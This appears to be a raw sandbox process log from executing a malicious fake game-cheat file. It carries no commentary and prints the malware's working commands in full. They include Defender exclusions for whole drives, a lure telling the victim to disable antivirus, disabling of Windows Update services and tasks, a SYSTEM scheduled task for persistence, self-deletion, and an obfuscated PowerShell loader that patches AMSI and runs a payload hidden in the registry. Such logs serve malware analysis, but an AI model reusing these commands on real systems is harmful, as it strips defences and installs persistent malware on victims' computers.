"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe

"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "

C:\driverPerf\cominto.exe

"C:\driverPerf\cominto.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:vVkefQIUvQwC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AAQFOfJxLMpQUK,[Parameter(Position=1)][Type]$iCwjxecoMc)$jOfnizMJkQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$jOfnizMJkQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');$jOfnizMJkQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$iCwjxecoMc,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');Write-Output $jOfnizMJkQb.CreateType();}$RWdfJfqcSOqwl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XtOHrAsMhQVPCC=$RWdfJfqcSOqwl.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RxQMonzJTZYvuAJuZlf=vVkefQIUvQwC @([String])([IntPtr]);$lIVeqidCFnkSzDFvrGZuwQ=vVkefQIUvQwC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jhOyDvGUFNp=$RWdfJfqcSOqwl.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$GIrXKKDTouyojI=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Load'+'LibraryA')));$KLaxLqgQheshZqDrx=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Vir'+'tual'+'Pro'+'tect')));$ldVmiTg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GIrXKKDTouyojI,$RxQMonzJTZYvuAJuZlf).Invoke('a'+'m'+'si.dll');$atXGZzrVcbonKTxog=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$ldVmiTg,[Object]('Ams'+'iSc'+'an'+'Buffer')));$hZEDmUcvGq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,4,[ref]$hZEDmUcvGq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$atXGZzrVcbonKTxog,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,0x20,[ref]$hZEDmUcvGq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YeocFvTjtgid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vzvlvLjQKVLmCw,[Parameter(Position=1)][Type]$LgmylDxtgV)$hUjRxOTTbMc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$hUjRxOTTbMc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');$hUjRxOTTbMc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LgmylDxtgV,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');Write-Output $hUjRxOTTbMc.CreateType();}$zgsSIaYIUXdHV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$ghIXlKeIEmhFWZ=$zgsSIaYIUXdHV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PFuejJVpaSVwPFaeurN=YeocFvTjtgid @([String])([IntPtr]);$GMAvUbPAXGggWCCVDeoDuq=YeocFvTjtgid @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HVecakmUUWL=$zgsSIaYIUXdHV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$kizSwqqfCWLZrt=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Load'+'LibraryA')));$QRZIjIYJmupCrAEym=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Vir'+'tual'+'Pro'+'tect')));$VSOiJlE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kizSwqqfCWLZrt,$PFuejJVpaSVwPFaeurN).Invoke('a'+'m'+'si.dll');$hAQzEHSkdjoheqKbZ=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$VSOiJlE,[Object]('Ams'+'iSc'+'an'+'Buffer')));$wBHwWyrcrB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,4,[ref]$wBHwWyrcrB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hAQzEHSkdjoheqKbZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,0x20,[ref]$wBHwWyrcrB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5ea441e2-6fb5-4e6a-9501-c34b8879db7e}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

